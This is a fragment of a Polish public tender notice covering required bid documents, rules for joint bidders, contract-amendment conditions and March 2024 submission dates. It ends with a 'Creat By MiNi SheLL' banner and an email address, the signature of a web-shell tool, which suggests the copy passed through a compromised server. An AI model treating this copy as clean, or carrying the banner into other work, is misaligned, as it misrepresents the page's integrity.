dokumenty:<br/>- wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia, nazwy wykonanego opracowania projektowego, podmiotu na rzecz którego opracowanie projektowe zostało wykonane wraz z adresem, terminu realizacji opracowania, oraz informacją o podstawie do dysponowania tymi osobami (Załącznik nr 6/6a/6b do SWZ) oraz oświadczeniem, że osoby przewidziane do realizacji zamówienia posiadają wymagane uprawnienia (Załącznik nr 7/7a/7b do SWZ).<br/>Podmiotowe środki dowodowe, o których mowa w ust. 2 Wykonawca przedłoży w terminie wskazanym przez Zamawiającego, lecz nie krótszym niż 5 dni. Podmiotowe środki dowodowe muszą być aktualne na dzień ich złożenia.<br/>3. Wszystkie wymagane oświadczenia Wykonawca składa w oryginale. Dokumenty Wykonawca składa w oryginale lub kopii poświadczonej za zgodność z oryginałem. Poświadczenia za zgodność z oryginałem dokonuje odpowiednio Wykonawca, podmiot, na którego zdolnościach lub sytuacji polega Wykonawca, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego albo podwykonawca, w zakresie dokumentów, które każdego z nich dotyczą.<br/>4. W przypadku, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości, co do jej prawdziwości, Zamawiający zastrzega sobie prawo do zażądania przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu.<br/>5. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Formularz ofertowy z wykorzystaniem wzoru (Załącznik nr 2 do SWZ);<br/>2) Pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów;<br/>3) Oświadczenia o braku podstaw do wykluczenia na podstawie art. 108 ust. 1 ustawy Pzp oraz oświadczenie o spełnianiu warunków udziału w postępowaniu, określonych w art. 112 ust. 2 ustawy Pzp (Załącznik nr 3/3a do SWZ), oświadczenie składane na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Załącznik nr 9/9a do SWZ);<br/>4) Zobowiązanie do oddania do dyspozycji niezbędnych zasobów na potrzeby wykonana zamówienia – Załącznik nr 8 do SWZ (składane jeżeli Wykonawca polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby);<br/>5) Harmonogram rzeczowo-finansowy (Załącznik nr 10/10a/10b do SWZ). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 4. Wykonawcy wspólnie ubiegający się o zamówienie:<br/>4.1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>4.2. W przypadku, o którym mowa w pkt. 4.1, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>4.3. Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców, o których mowa w pkt. 4.1.<br/>4.4. Jeżeli oferta Wykonawców, o których mowa w pkt. 4.1, została wybrana, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców.<br/>4.5. Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w pkt. 2.2, jest spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane.<br/>4.6. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>4.7. W przypadku, o którym mowa w pkt. 4.5 i 4.6, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwość dokonywania następujących zmian w umowie (na podstawie art. 455 ustawy Prawo zamówień publicznych): <br/>1) Zmiana umownego terminu zakończenia przedmiotu niniejszej Umowy jest możliwa w następujących przypadkach: <br/>a) przedłużającego się poza wynikający z obowiązującego prawa, a więc z winy instytucji wydających oraz przedłużającego się terminu wydania niezbędnych do wykonania przedmiotu umowy stosownych decyzji, pozwoleń, uzgodnień itp.,<br/>b) wystąpienie okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności, <br/>c) w przypadku nałożenia podczas realizacji dodatkowych opracowań przez dysponentów sieci (Zakład Energetyczny, TP SA, Zakładu Gazowego lub innych dysponentów sieci), <br/>d) w przypadku wystąpienia okoliczności niezależnych od Wykonawcy i Zamawiającego, skutkujących czasowym zawieszeniem realizacji umowy w tym: w wyniku działań osób trzecich,<br/>e) w przypadku braku zgody właścicieli nieruchomości na wykonanie opracowań na nieruchomościach objętych przedmiotem zamówienia, <br/>f) w przypadku zmiany trasy przebiegu sieci od planowanej w założeniach postępowania w wyniku nieprzewidzianych okoliczności,<br/>g) wydłużającego się okresu wydania warunków przebudowania infrastruktury przez dysponentów sieci, <br/>h) w przypadku wystąpienia okoliczności niezależnych od Wykonawcy i Zamawiającego, skutkujących czasowym zawieszeniem realizacji umowy w tym: w wyniku działań osób trzecich, napotkanych nieprzewidzianych podczas wydania decyzji związanych z realizacją dokumentacji, <br/>i) w przypadku wystąpienia zdarzenia nadzwyczajnego, zewnętrznego, niemożliwego do przewidzenia i zapobieżenia, którego nie dało się uniknąć nawet przy zachowaniu najwyższej staranności, a które uniemożliwia Wykonawcy wykonanie jego zobowiązania w całości lub części. W szczególności są to zdarzenia i okoliczności takie jak: klęska żywiołowa, działania wojenne, rebelie, terroryzm, epidemia, pandemia, rewolucja, powstanie, inwazja, bunt, zamieszki, strajk spowodowany przez inne osoby nie związane z realizacją inwestycji,<br/>j) czasowego wstrzymania usługi z przyczyn nie leżących po stronie Wykonawcy: <br/>- przez Zamawiającego,<br/>- wskutek decyzji administracyjnej. <br/>O powyższych okolicznościach Wykonawca powiadomi Zamawiającego pisemnie. <br/>Terminu zakończenia może zostać przesunięty o czas zawieszenia realizacji przedmiotu umowy lub niezbędny do wznowienia prac potwierdzony pismem złożonym w siedzibie Zamawiającego. <br/><br/>Ze względu na ograniczoną ilość znaków, pełny opis dot. rodzaju i zakresu zmian umowy oraz warunków ich wprowadzenia zawarty jest w Rozdziale XXXII SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-03-01 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pomocą Platformy e-Zamówienia dostępnej pod adresem: https://ezamowienia.gov.pl.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-03-01 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-03-30</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com